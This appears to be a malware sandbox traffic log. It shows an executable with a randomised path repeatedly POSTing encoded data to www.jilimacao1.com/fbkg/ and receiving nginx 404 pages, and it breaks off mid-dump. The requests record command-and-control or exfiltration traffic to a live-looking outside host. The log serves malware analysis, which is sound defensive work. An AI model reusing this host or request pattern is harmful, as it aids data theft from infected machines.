                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:32:40 GMT
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                X-Cache: BYPASS
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                7634.126.191.8480192.168.11.2050203C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:32:40.070699930 CET1474OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.jilimacao1.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.jilimacao1.com
                                                                                                                                                                                                Referer: http://www.jilimacao1.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 36 4c 33 6b 45 75 50 69 56 59 50 66 69 39 2f 43 57 6d 44 53 56 50 71 65 35 4a 31 4e 52 4d 68 53 59 6e 68 34 31 62 76 6b 74 59 46 44 45 72 31 6d 70 67 4a 68 32 5a 55 43 56 58 47 48 65 44 44 45 32 65 44 6e 4d 6c 71 58 41 72 53 79 31 33 44 79 6a 37 6b 61 2b 58 35 74 35 62 78 7a 4d 72 51 65 2b 5a 51 34 74 76 48 77 2b 6c 66 38 73 4f 54 36 6c 75 79 6e 70 63 4e 31 33 63 77 46 59 41 48 4f 58 4c 39 77 4a 38 76 47 6b 4a 73 70 76 6c 46 4b 76 63 58 6c 49 4d 71 36 48 78 70 61 4d 63 67 6c 61 50 5a 34 66 6f 77 6d 6f 57 48 48 5a 44 64 4f 51 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=M6L3kEuPiVYPfi9/CWmDSVPqe5J1NRMhSYnh41bvktYFDEr1mpgJh2ZUCVXGHeDDE2eDnMlqXArSy13Dyj7ka+X5t5bxzMrQe+ZQ4tvHw+lf8sOT6luynpcN13cwFYAHOXL9wJ8vGkJspvlFKvcXlIMq6HxpaMcglaPZ4fowmoWHHZDdOQ==
                                                                                                                                                                                                Nov 17, 2023 19:32:40.484343052 CET1475INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:32:40 GMT
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                X-Cache: BYPASS
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                77192.168.11.205020434.126.191.8480C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:32:42.941498995 CET1476OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.jilimacao1.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.jilimacao1.com
                                                                                                                                                                                                Referer: http://www.jilimacao1.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 36 4c 33 6b 45 75 50 69 56 59 50 66 48 31 2f 45 31 4f 44 54 31 50 6c 52 5a 4a 31 45 78 4d 66 53 59 62 68 34 33 32 69 6a 66 73 46 41 6c 62 31 6e 74 55 4a 79 47 5a 55 46 6c 58 44 59 4f 44 4b 45 32 61 78 6e 4a 64 71 58 45 4c 53 7a 47 2f 44 35 7a 37 6e 52 65 58 36 39 70 62 77 6b 63 71 52 65 2b 46 36 34 76 54 48 33 4f 5a 66 39 76 6d 54 39 77 61 31 6a 4a 64 6e 33 33 63 76 4c 34 41 7a 4f 57 33 4c 77 49 46 51 47 56 4e 73 70 4c 56 46 4a 76 63 57 2b 6f 4d 77 34 48 77 78 57 63 78 48 2f 59 72 56 67 76 55 36 6e 71 50 32 44 37 53 79 5a 48 34 5a 71 41 6d 6d 58 67 4a 4a 31 65 43 4f 4d 68 74 6d 6e 58 61 30 44 5a 53 56 31 4b 55 4b 68 37 6a 68 53 74 2b 56 2f 36 52 35 74 53 56 41 6c 4d 2b 36 4e 2b 6e 50 6d 66 51 78 6e 51 34 39 64 55 64 37 54 6a 31 55 63 79 78 36 47 38 69 4a 69 54 6a 70 66 46 53 4f 71 75 69 49 49 56 35 69 2b 62 54 38 73 71 61 69 78 63 32 6a 65 7a 71 39 32 4f 6b 4d 6c 69 70 7a 38 32 49 4c 47 52 72 52 52 5a 6c 65 66 71 66 74 48 6d 65 45 50 5a 6c 57 66 4c 46 2f 30 45 6f 36 37 6c 51 55 41 46 57 52 64 48 58 68 79 7a 44 48 32 6b 49 74 43 62 6a 78 41 36 6d 34 5a 51 70 6d 4c 63 4f 79 79 33 6d 44 56 36 63 32 73 52 49 52 62 61 79 34 4e 36 71 41 66 2f 62 74 74 37 37 51 44 46 6c 2f 67 50 42 64 79 6c 58 50 38 57 53 48 6c 36 61 57 43 35 76 68 67 2f 67 63 4e 39 31 6e 68 58 34 51 59 48 76 75 65 53 6f 74 79 43 59 52 4f 63 47 39 53 73 42 34 70 62 56 57 35 69 34 53 71 4a 59 68 75 33 72 35 54 67 37 35 7a 47 77 49 4a 67 33 77 70 2b 59 72 6a 73 63 76 36 70 67 68 31 66 52 4e 4b 57 6c 38 34 57 65 32 62 76 77 58 71 4b 4b 50 6e 56 2b 38 57 41 68 54 33 31 59 3d
                                                                                                                                                                                                Data Ascii: T6I=M6L3kEuPiVYPfH1/E1ODT1PlRZJ1ExMfSYbh432ijfsFAlb1ntUJyGZUFlXDYODKE2axnJdqXELSzG/D5z7nReX69pbwkcqRe+F64vTH3OZf9vmT9wa1jJdn33cvL4AzOW3LwIFQGVNspLVFJvcW+oMw4HwxWcxH/YrVgvU6nqP2D7SyZH4ZqAmmXgJJ1eCOMhtmnXa0DZSV1KUKh7jhSt+V/6R5tSVAlM+6N+nPmfQxnQ49dUd7Tj1Ucyx6G8iJiTjpfFSOquiIIV5i+bT8sqaixc2jezq92OkMlipz82ILGRrRRZlefqftHmeEPZlWfLF/0Eo67lQUAFWRdHXhyzDH2kItCbjxA6m4ZQpmLcOyy3mDV6c2sRIRbay4N6qAf/btt77QDFl/gPBdylXP8WSHl6aWC5vhg/gcN91nhX4QYHvueSotyCYROcG9SsB4pbVW5i4SqJYhu3r5Tg75zGwIJg3wp+Yrjscv6pgh1fRNKWl84We2bvwXqKKPnV+8WAhT31Y=
                                                                                                                                                                                                Nov 17, 2023 19:32:43.366050959 CET1477INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:32:43 GMT
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                X-Cache: BYPASS
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                7734.126.191.8480192.168.11.2050204C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:32:42.941498995 CET1476OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.jilimacao1.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.jilimacao1.com
                                                                                                                                                                                                Referer: http://www.jilimacao1.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 36 4c 33 6b 45 75 50 69 56 59 50 66 48 31 2f 45 31 4f 44 54 31 50 6c 52 5a 4a 31 45 78 4d 66 53 59 62 68 34 33 32 69 6a 66 73 46 41 6c 62 31 6e 74 55 4a 79 47 5a 55 46 6c 58 44 59 4f 44 4b 45 32 61 78 6e 4a 64 71 58 45 4c 53 7a 47 2f 44 35 7a 37 6e 52 65 58 36 39 70 62 77 6b 63 71 52 65 2b 46 36 34 76 54 48 33 4f 5a 66 39 76 6d 54 39 77 61 31 6a 4a 64 6e 33 33 63 76 4c 34 41 7a 4f 57 33 4c 77 49 46 51 47 56 4e 73 70 4c 56 46 4a 76 63 57 2b 6f 4d 77 34 48 77 78 57 63 78 48 2f 59 72 56 67 76 55 36 6e 71 50 32 44 37 53 79 5a 48 34 5a 71 41 6d 6d 58 67 4a 4a 31 65 43 4f 4d 68 74 6d 6e 58 61 30 44 5a 53 56 31 4b 55 4b 68 37 6a 68 53 74 2b 56 2f 36 52 35 74 53 56 41 6c 4d 2b 36 4e 2b 6e 50 6d 66 51 78 6e 51 34 39 64 55 64 37 54 6a 31 55 63 79 78 36 47 38 69 4a 69 54 6a 70 66 46 53 4f 71 75 69 49 49 56 35 69 2b 62 54 38 73 71 61 69 78 63 32 6a 65 7a 71 39 32 4f 6b 4d 6c 69 70 7a 38 32 49 4c 47 52 72 52 52 5a 6c 65 66 71 66 74 48 6d 65 45 50 5a 6c 57 66 4c 46 2f 30 45 6f 36 37 6c 51 55 41 46 57 52 64 48 58 68 79 7a 44 48 32 6b 49 74 43 62 6a 78 41 36 6d 34 5a 51 70 6d 4c 63 4f 79 79 33 6d 44 56 36 63 32 73 52 49 52 62 61 79 34 4e 36 71 41 66 2f 62 74 74 37 37 51 44 46 6c 2f 67 50 42 64 79 6c 58 50 38 57 53 48 6c 36 61 57 43 35 76 68 67 2f 67 63 4e 39 31 6e 68 58 34 51 59 48 76 75 65 53 6f 74 79 43 59 52 4f 63 47 39 53 73 42 34 70 62 56 57 35 69 34 53 71 4a 59 68 75 33 72 35 54 67 37 35 7a 47 77 49 4a 67 33 77 70 2b 59 72 6a 73 63 76 36 70 67 68 31 66 52 4e 4b 57 6c 38 34 57 65 32 62 76 77 58 71 4b 4b 50 6e 56 2b 38 57 41 68 54 33 31 59 3d
                                                                                                                                                                                                Data Ascii: T6I=M6L3kEuPiVYPfH1/E1ODT1PlRZJ1ExMfSYbh432ijfsFAlb1ntUJyGZUFlXDYODKE2axnJdqXELSzG/D5z7nReX69pbwkcqRe+F64vTH3OZf9vmT9wa1jJdn33cvL4AzOW3LwIFQGVNspLVFJvcW+oMw4HwxWcxH/YrVgvU6nqP2D7SyZH4ZqAmmXgJJ1eCOMhtmnXa0DZSV1KUKh7jhSt+V/6R5tSVAlM+6N+nPmfQxnQ49dUd7Tj1Ucyx6G8iJiTjpfFSOquiIIV5i+bT8sqaixc2jezq92OkMlipz82ILGRrRRZlefqftHmeEPZlWfLF/0Eo67lQUAFWRdHXhyzDH2kItCbjxA6m4ZQpmLcOyy3mDV6c2sRIRbay4N6qAf/btt77QDFl/gPBdylXP8WSHl6aWC5vhg/gcN91nhX4QYHvueSotyCYROcG9SsB4pbVW5i4SqJYhu3r5Tg75zGwIJg3wp+Yrjscv6pgh1fRNKWl84We2bvwXqKKPnV+8WAhT31Y=
                                                                                                                                                                                                Nov 17, 2023 19:32:43.366050959 CET1477INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:32:43 GMT
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                X-Cache: BYPASS
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                7834.126.191.8480192.168.11.2050205C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:32:45.810019970 CET1480OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.jilimacao1.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.jilimacao1.com
                                                                                                                                                                                                Referer: http://www.jilimacao1.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 36 4c 33 6b 45 75 50 69 56 59 50 66 48 31 2f 45 31 4f 44 54 31 50 6c 52 5a 4a 31 45 78 4d 66 53 59 62 68 34 33 32 69 6a 66 55 46 41 57 54 31 6f 73 55 4a 78 47 5a 55 47 6c 58 43 59 4f 43 59 45 79 33 36 6e 4a 5a 36 58 43 48 53 7a 58 76 44 36 42 44 6e 55 65 58 2f 67 5a 62 2b 7a 4d 71 4e 65 2b 59 74 34 76 47 38 77 2b 74 66 38 6f 43 54 35 48 47 79 76 35 63 4e 33 33 63 7a 64 34 41 37 4f 57 7a 62 77 49 4a 51 47 51 4e 73 70 36 70 46 61 75 63 57 6b 49 4e 43 74 58 77 31 64 38 78 32 2f 59 2f 72 67 76 55 41 6e 6f 2f 32 44 35 61 79 57 6b 51 65 70 67 6d 6d 55 67 4a 4b 78 65 50 6d 4d 6e 49 31 6e 58 65 30 44 62 69 56 32 71 55 4b 77 71 6a 69 66 64 2b 70 70 4b 51 76 67 79 5a 59 6c 50 44 4a 4e 36 72 50 6d 76 45 78 6b 48 59 39 66 31 64 37 62 6a 31 57 59 79 78 74 66 73 69 76 69 54 53 56 66 46 79 30 71 74 4f 49 5a 41 4e 69 38 35 37 37 72 4b 61 73 2b 38 33 37 56 54 32 78 32 4f 30 49 6c 69 6f 34 38 7a 77 4c 47 42 37 52 51 62 4e 64 65 61 65 45 50 47 66 65 61 4a 70 4d 66 4c 59 79 30 45 51 71 37 6d 38 55 41 6c 57 52 57 41 44 75 34 44 44 63 30 6b 4a 77 50 37 69 33 41 36 71 43 5a 55 77 62 4b 73 69 79 6a 58 32 44 52 71 63 35 6e 52 4a 35 52 36 79 32 47 61 71 41 66 2f 6e 58 74 37 33 51 41 30 64 2f 68 38 5a 64 69 69 4c 50 37 6d 54 4f 6c 36 61 44 43 35 6a 6f 67 2f 6f 32 4e 39 46 4a 68 56 30 51 59 57 2f 75 54 78 77 75 35 53 59 51 4b 63 48 6e 66 4d 63 67 70 62 34 61 35 69 6f 73 72 36 63 68 76 33 37 35 58 67 37 36 6a 32 77 4c 5a 77 33 63 37 4f 45 33 6a 73 41 56 36 71 38 78 31 59 56 4e 4a 69 6f 6d 67 32 47 57 5a 39 4d 48 69 74 32 35 74 6a 71 71 4b 41 74 31 6a 43 41 49 34 30 59 53 2b 48 33 4b 37 4c 7a 38 2b 6b 31 78 51 78 54 4d 6a 6c 68 68 66 72 78 37 49 78 53 34 6d 65 52 5a 48 58 7a 50 7a 52 48 38 49 65 48 48 56 63 68 30 38 6e 44 2b 39 61 6a 65 46 58 75 56 4d 64 58 7a 4b 6b 74 49 33 2b 2b 57 77 73 49 63 6b 4a 6f 5a 34 66 78 67 31 58 52 4c 51 4b 4e 56 6c 4d 79 74 49 52 45 53 59 56 5a 30 76 78 75 73 34 4d 38 38 34 66 53 73 4c 76 72 77 73 62 30 5a 62 38 30 56 39 77 4f 63 4d 34 44 62 37 6b 5a 2f 48 48 69 58 6f 75 75 70 63 41 73 58 4c 41 49 6d 39 67 77 66 6b 73 76 31 75 4b 69 56 59 32 45 45 48 66 77 6b 59 37 52 4f 72 5a 77 4e 4d 52 58 45 36 4f 47 68 51 35 7a 67 42 44 48 79 4f 51 77 77 4d 52 74 6e 4b 70 4e 41 62 33 66 75 32 49 31 37 42 35 55 42 72 4a 78 6b 64 51 75 48 2b 4b 72 6f 6d 72 71 69 34 70 37 4a 42 48 48 6c 37 6b 53 49 61 48 47 45 64 75 63 74 50 70 6f 38 76 33 7a 42 31 6a 56 6c 4b 70 70 75 59 67 53 6c 63 68 